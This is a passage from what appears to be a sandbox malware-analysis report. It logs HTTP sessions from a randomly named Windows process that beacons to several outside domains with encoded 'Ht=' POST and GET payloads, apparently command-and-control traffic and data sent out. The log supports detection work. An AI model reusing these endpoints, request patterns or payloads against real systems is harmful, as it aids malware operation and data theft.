                                                          Data Ascii: rkingweb&utm_campaign=parkingweb&utm_content=sitebuilder">Create your website with Loopia Sitebuilder</a></li></ul></p><a href="https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          6 | 192.168.2.11 | 49987 | 194.9.94.86 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:32.064378977 CET | 623 | OUT | POST /57zf/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.deeplungatlas.org
                                                          Origin: http://www.deeplungatlas.org
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.deeplungatlas.org/57zf/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Ascii: Ht=cQ/jsRtgtxwgH4pkAfRUYGLqr1dZiz1EYO2mtofjaW/OX+F70N0sP1TuVomDMq+xlEqXjQtvXwZfXJhv6jCP1IaLWuveW3sYfKpdCQZvwJvTwzmMUDwTyGN/B4NFKgDAb6vC8nJQmXZLPk7sGXRwlduRXg3GjHNoOUuOdRetrp3gxGFB3/GCLibcenZ2xmKYmh7HsDuQjOxaj/rpoKRNMpE=
                                                          Nov 15, 2024 09:32:32.894706011 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:32:32 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/8.1.29
                                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                          Nov 15, 2024 09:32:32.894757986 CET | 212 | IN
                                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
                                                          Nov 15, 2024 09:32:32.894783974 CET | 1236 | IN
                                                          Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
                                                          Nov 15, 2024 09:32:32.894798994 CET | 1236 | IN
                                                          Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
                                                          Nov 15, 2024 09:32:32.894814968 CET | 1236 | IN
                                                          Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
                                                          Nov 15, 2024 09:32:32.894829988 CET | 666 | IN
                                                          Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          7 | 192.168.2.11 | 49988 | 194.9.94.86 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:34.602211952 CET | 1636 | OUT | POST /57zf/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.deeplungatlas.org
                                                          Origin: http://www.deeplungatlas.org
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.deeplungatlas.org/57zf/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Ascii: Ht= [TRUNCATED]
                                                          Nov 15, 2024 09:32:35.472021103 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:32:35 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/8.1.29
                                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                          Nov 15, 2024 09:32:35.472040892 CET | 212 | IN
                                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
                                                          Nov 15, 2024 09:32:35.472057104 CET | 1236 | IN
                                                          Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
                                                          Nov 15, 2024 09:32:35.472071886 CET | 1236 | IN
                                                          Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
                                                          Nov 15, 2024 09:32:35.472088099 CET | 1236 | IN
                                                          Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
                                                          Nov 15, 2024 09:32:35.472104073 CET | 666 | IN
                                                          Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          8 | 192.168.2.11 | 49989 | 194.9.94.86 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:37.205796003 CET | 329 | OUT | GET /57zf/?Ht=RSXDvmZ18TUSGahlBulUTEWs/Fcq4D9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmi6ITFfezPRUw2CIw7GC9Ov+fkwE2kIiBG9Hg=&VRvXS=WfxxDba8X HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.deeplungatlas.org
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:32:38.015513897 CET | 1236 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:32:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          X-Powered-By: PHP/8.1.29
                                                          Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                          Nov 15, 2024 09:32:38.015625954 CET | 212 | IN
                                                          Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
                                                          Nov 15, 2024 09:32:38.015640020 CET | 1236 | IN
                                                          Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
                                                          Nov 15, 2024 09:32:38.015655041 CET | 1236 | IN
                                                          Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
                                                          Nov 15, 2024 09:32:38.015671015 CET | 1236 | IN
                                                          Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
                                                          Nov 15, 2024 09:32:38.015687943 CET | 666 | IN
                                                          Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          9 | 192.168.2.11 | 49990 | 170.39.213.43 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:43.527249098 CET | 597 | OUT | POST /53y2/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.ultrawin23.shop
                                                          Origin: http://www.ultrawin23.shop
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.ultrawin23.shop/53y2/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Data Ascii: Ht=g9hy0qy2fRRtF+H9iOcT0xdYt5tjlZZB1N0McRb7kUb3qU2asz4co9GA8cTS9E4bgHYfRsRKT0Rhm9sHpZyyghReaSSCObqwF3C616aNUMsgsqiCeRHlfFNxt/yOQz04H9Xsn1PifRh+QNrSB7tNqNBYNUDCfx3zNysm2XR2O23esbXR9XwX9qOFmjdGXobZfw==
                                                          Nov 15, 2024 09:32:44.114614964 CET | 907 | IN | HTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          content-type: text/html
                                                          content-length: 707
                                                          date: Fri, 15 Nov 2024 08:32:44 GMT
                                                          server: LiteSpeed
                                                          location: https://www.ultrawin23.shop/53y2/
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          10 | 192.168.2.11 | 49991 | 170.39.213.43 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:46.072084904 CET | 617 | OUT | POST /53y2/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.ultrawin23.shop
                                                          Origin: http://www.ultrawin23.shop
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.ultrawin23.shop/53y2/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:32:46.651662111 CET | 907 | IN | HTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          content-type: text/html
                                                          content-length: 707
                                                          date: Fri, 15 Nov 2024 08:32:46 GMT
                                                          server: LiteSpeed
                                                          location: https://www.ultrawin23.shop/53y2/
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          11 | 192.168.2.11 | 49992 | 170.39.213.43 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:48.616911888 CET | 1630 | OUT | POST /53y2/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.ultrawin23.shop
                                                          Origin: http://www.ultrawin23.shop
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.ultrawin23.shop/53y2/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:32:49.193069935 CET | 907 | IN | HTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          content-type: text/html
                                                          content-length: 707
                                                          date: Fri, 15 Nov 2024 08:32:49 GMT
                                                          server: LiteSpeed
                                                          location: https://www.ultrawin23.shop/53y2/
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          12 | 192.168.2.11 | 49993 | 170.39.213.43 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:51.160948038 CET | 327 | OUT | GET /53y2/?Ht=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yvh9yDCOMNYuNEmOK8YK5XL8j59+xTS7wZgA=&VRvXS=WfxxDba8X HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.ultrawin23.shop
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:32:51.740057945 CET | 1047 | IN | HTTP/1.1 301 Moved Permanently
                                                          Connection: close
                                                          content-type: text/html
                                                          content-length: 707
                                                          date: Fri, 15 Nov 2024 08:32:51 GMT
                                                          server: LiteSpeed
                                                          location: https://www.ultrawin23.shop/53y2/?Ht=t/JS3aCWZhQCYNrXnvgf+Spfn+QwkJd9+ukIZkrf2wKhs0ak4EV/sNuml9GQ/gRnrRAuSs9LfWphueMxgO6yvh9yDCOMNYuNEmOK8YK5XL8j59+xTS7wZgA=&VRvXS=WfxxDba8X
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          13 | 192.168.2.11 | 49994 | 13.248.169.48 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:56.809571981 CET | 588 | OUT | POST /ew98/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.sonoscan.org
                                                          Origin: http://www.sonoscan.org
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.sonoscan.org/ew98/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          14 | 192.168.2.11 | 49995 | 13.248.169.48 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:32:59.355031013 CET | 608 | OUT | POST /ew98/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.sonoscan.org
                                                          Origin: http://www.sonoscan.org
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.sonoscan.org/ew98/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          15 | 192.168.2.11 | 49996 | 13.248.169.48 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:01.899226904 CET | 1621 | OUT | POST /ew98/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.sonoscan.org
                                                          Origin: http://www.sonoscan.org
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.sonoscan.org/ew98/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          16 | 192.168.2.11 | 49997 | 13.248.169.48 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:04.441015959 CET | 324 | OUT | GET /ew98/?Ht=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpmRDvWvsjjx3B4XGnqR7Idwi9xFOqzFZTxLg=&VRvXS=WfxxDba8X HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.sonoscan.org
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:05.122713089 CET | 394 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 15 Nov 2024 08:33:05 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 254
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ht=DRp8qVXu3DttXwSjdKhWcEeMlFq8C+hogWxSvfZ4d/ir/4GJO1kBPGKjrfOH+I9HTBbwMxIq6OZmA+t0U8cpmRDvWvsjjx3B4XGnqR7Idwi9xFOqzFZTxLg=&VRvXS=WfxxDba8X"}</script></head></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          17 | 192.168.2.11 | 49998 | 38.47.232.194 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:10.845314980 CET | 579 | OUT | POST /45n6/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.zz67x.top
                                                          Origin: http://www.zz67x.top
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 199
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.zz67x.top/45n6/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:11.797110081 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:33:11 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          18 | 192.168.2.11 | 49999 | 38.47.232.194 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:13.382946968 CET | 599 | OUT | POST /45n6/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.zz67x.top
                                                          Origin: http://www.zz67x.top
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 219
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.zz67x.top/45n6/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:14.326690912 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:33:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          19 | 192.168.2.11 | 50000 | 38.47.232.194 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:15.930581093 CET | 1612 | OUT | POST /45n6/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.zz67x.top
                                                          Origin: http://www.zz67x.top
                                                          Cache-Control: no-cache
                                                          Connection: close
                                                          Content-Length: 1231
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.zz67x.top/45n6/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:16.886461020 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:33:16 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          20 | 192.168.2.11 | 50001 | 38.47.232.194 | 80 | 3732 | C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Nov 15, 2024 09:33:18.482115030 CET | 321 | OUT | GET /45n6/?VRvXS=WfxxDba8X&Ht=djThxhCXsVTaW29IStONWe6xHREL7sfT17x4FrONtsEdvh3lUnzIZnalbCLaN+V127dkaLgcrePaRgDcNiYylWN2xRdIuk3ZdTLMRFf+/Hm0bLjKb/7io/E= HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Host: www.zz67x.top
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                          Nov 15, 2024 09:33:19.413183928 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Fri, 15 Nov 2024 08:33:19 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: close
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
